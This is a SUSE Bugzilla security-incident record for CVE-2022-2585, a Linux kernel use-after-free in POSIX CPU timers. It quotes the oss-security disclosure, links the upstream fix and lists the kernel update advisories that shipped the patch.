Bug 1202094 (CVE-2022-2585)

Summary: VUL-0: CVE-2022-2585: kernel-source: use-after-free in POSIX CPU timer
Product: [Novell Products] SUSE Security Incidents Reporter: Robert Frohl <rfrohl>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: meissner, mkoutny, pmladek
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/338821/
Whiteboard: CVSSv3.1:SUSE:CVE-2022-2585:8.4:(AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Bug Depends on:    
Bug Blocks: 1202163    

Comment 9 Robert Frohl 2022-08-10 05:48:29 UTC 
oss-security:
CVE-2022-2585 - Linux kernel POSIX CPU timer UAF

It was discovered that when exec'ing from a non-leader thread, armed POSIX
CPU timers would be left on a list but freed, leading to a use-after-free.

An independent security researcher working with SSD Secure Disclosure
discovered that this vulnerability could be exploited for Local Privilege
Escalation.

This bug was introduced by commit 55e8c8eb2c7b ("posix-cpu-timers: Store a
reference to a pid not a task"), which is present since v5.7-rc1.

This has been assigned CVE-2022-2585.

A PoC that will trigger KASAN is going to be posted in a week.

A fix has been sent to linux-kernel@vger.kernel.org and is at
https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u.
Comment 11 Swamp Workflow Management 2022-08-12 19:17:59 UTC 
SUSE-SU-2022:2803-1: An update that solves 5 vulnerabilities, contains 7 features and has 16 fixes is now available.

Category: security (important)
Bug References: 1190256,1190497,1199291,1199356,1199665,1201258,1201323,1201391,1201458,1201592,1201593,1201595,1201596,1201635,1201651,1201691,1201705,1201726,1201846,1201930,1202094
CVE References: CVE-2021-33655,CVE-2022-21505,CVE-2022-2585,CVE-2022-26373,CVE-2022-29581
JIRA References: SLE-21132,SLE-24569,SLE-24570,SLE-24571,SLE-24578,SLE-24635,SLE-24682
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.14.21-150400.24.18.1, kernel-64kb-5.14.21-150400.24.18.1, kernel-debug-5.14.21-150400.24.18.1, kernel-default-5.14.21-150400.24.18.1, kernel-default-base-5.14.21-150400.24.18.1.150400.24.5.4, kernel-docs-5.14.21-150400.24.18.1, kernel-kvmsmall-5.14.21-150400.24.18.1, kernel-obs-build-5.14.21-150400.24.18.1, kernel-obs-qa-5.14.21-150400.24.18.1, kernel-source-5.14.21-150400.24.18.1, kernel-syms-5.14.21-150400.24.18.1, kernel-zfcpdump-5.14.21-150400.24.18.1
SUSE Linux Enterprise Workstation Extension 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1
SUSE Linux Enterprise Module for Live Patching 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1, kernel-livepatch-SLE15-SP4_Update_2-1-150400.9.5.2
SUSE Linux Enterprise Module for Legacy Software 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1
SUSE Linux Enterprise Module for Development Tools 15-SP4 (src):    kernel-docs-5.14.21-150400.24.18.1, kernel-obs-build-5.14.21-150400.24.18.1, kernel-source-5.14.21-150400.24.18.1, kernel-syms-5.14.21-150400.24.18.1
SUSE Linux Enterprise Module for Basesystem 15-SP4 (src):    kernel-64kb-5.14.21-150400.24.18.1, kernel-default-5.14.21-150400.24.18.1, kernel-default-base-5.14.21-150400.24.18.1.150400.24.5.4, kernel-source-5.14.21-150400.24.18.1, kernel-zfcpdump-5.14.21-150400.24.18.1
SUSE Linux Enterprise High Availability 15-SP4 (src):    kernel-default-5.14.21-150400.24.18.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 17 Swamp Workflow Management 2022-09-16 13:25:10 UTC 
SUSE-SU-2022:3288-1: An update that solves 25 vulnerabilities, contains four features and has 91 fixes is now available.

Category: security (important)
Bug References: 1023051,1032323,1065729,1156395,1189999,1190497,1192968,1194592,1194869,1194904,1195480,1195917,1196616,1197158,1197391,1197755,1197756,1197757,1197763,1198410,1198577,1198702,1198971,1199356,1199515,1200301,1200313,1200431,1200544,1200845,1200868,1200869,1200870,1200871,1200872,1200873,1201019,1201308,1201361,1201442,1201455,1201489,1201610,1201726,1201768,1201865,1201940,1201948,1201956,1202094,1202096,1202097,1202113,1202131,1202154,1202262,1202265,1202346,1202347,1202385,1202393,1202447,1202471,1202558,1202564,1202623,1202636,1202672,1202681,1202710,1202711,1202712,1202713,1202715,1202716,1202757,1202758,1202759,1202761,1202762,1202763,1202764,1202765,1202766,1202767,1202768,1202769,1202770,1202771,1202773,1202774,1202775,1202776,1202778,1202779,1202780,1202781,1202782,1202783,1202822,1202823,1202824,1202860,1202867,1202872,1202898,1202989,1203036,1203041,1203063,1203098,1203107,1203117,1203138,1203139,1203159
CVE References: CVE-2016-3695,CVE-2020-36516,CVE-2021-33135,CVE-2021-4037,CVE-2022-1184,CVE-2022-20368,CVE-2022-20369,CVE-2022-2585,CVE-2022-2588,CVE-2022-26373,CVE-2022-2639,CVE-2022-2663,CVE-2022-28356,CVE-2022-28693,CVE-2022-2873,CVE-2022-2905,CVE-2022-2938,CVE-2022-2959,CVE-2022-2977,CVE-2022-3028,CVE-2022-3078,CVE-2022-36879,CVE-2022-36946,CVE-2022-39188,CVE-2022-39190
JIRA References: SLE-19359,SLE-23766,SLE-24572,SLE-24682
Sources used:
openSUSE Leap 15.4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1
SUSE Linux Enterprise Module for Public Cloud 15-SP4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 18 Marcus Meissner 2022-11-04 14:29:19 UTC 
done